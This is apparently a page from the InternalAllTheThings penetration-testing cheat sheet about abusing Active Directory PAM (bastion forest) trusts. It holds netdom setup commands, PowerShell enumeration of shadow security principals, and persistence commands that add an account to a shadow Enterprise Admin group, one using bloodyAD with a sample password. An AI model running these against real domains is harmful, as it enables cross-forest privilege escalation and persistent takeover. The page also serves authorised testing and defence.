trust-pam.md (2789B)
1 --- 2 title: "Trust - Privileged Access Management" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/trust-pam.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/trust-pam.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Trust - Privileged Access Management 12 13 > PAM (Privileged Access Management) introduces bastion forest for management, Shadow Security Principals (groups mapped to high priv groups of managed forests). These allow management of other forests without making changes to groups or ACLs and without interactive logon. 14 15 Requirements: 16 17 * Windows Server 2016 or earlier 18 19 If we compromise the bastion we get `Domain Admins` privileges on the other domain 20 21 * Default configuration for PAM Trust 22 23 ```ps1 24 # execute on our forest 25 netdom trust lab.local /domain:bastion.local /ForestTransitive:Yes 26 netdom trust lab.local /domain:bastion.local /EnableSIDHistory:Yes 27 netdom trust lab.local /domain:bastion.local /EnablePIMTrust:Yes 28 netdom trust lab.local /domain:bastion.local /Quarantine:No 29 # execute on our bastion 30 netdom trust bastion.local /domain:lab.local /ForestTransitive:Yes 31 ``` 32 33 * Enumerate PAM trusts 34 35 ```ps1 36 # Detect if current forest is PAM trust 37 Import ADModule 38 Get-ADTrust -Filter {(ForestTransitive -eq $True) -and (SIDFilteringQuarantined -eq $False)} 39 40 # Enumerate shadow security principals 41 Get-ADObject -SearchBase ("CN=Shadow Principal Configuration,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Filter * -Properties * | select Name,member,msDS-ShadowPrincipalSid | fl 42 43 # Enumerate if current forest is managed by a bastion forest 44 # Trust_Attribute_PIM_Trust + Trust_Attribute_Treat_As_External 45 Get-ADTrust -Filter {(ForestTransitive -eq $True)} 46 ``` 47 48 * Compromise 49 * Using the previously found Shadow Security Principal (WinRM account, RDP access, SQL, ...) 50 * Using SID History 51 * Persistence 52 * Windows/Linux: 53 54 ```ps1 55 bloodyAD --host 10.1.0.4 -u john.doe -p 'Password123!' -d bloody add groupMember 'CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local' Administrator 56 ``` 57 58 * Windows only: 59 60 ```ps1 61 # Add a compromised user to the group 62 Set-ADObject -Identity "CN=forest-ShadowEnterpriseAdmin,CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=domain,DC=local" -Add @{'member'="CN=Administrator,CN=Users,DC=domain,DC=local"} 63 ``` 64 65 ## References 66 67 * [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html)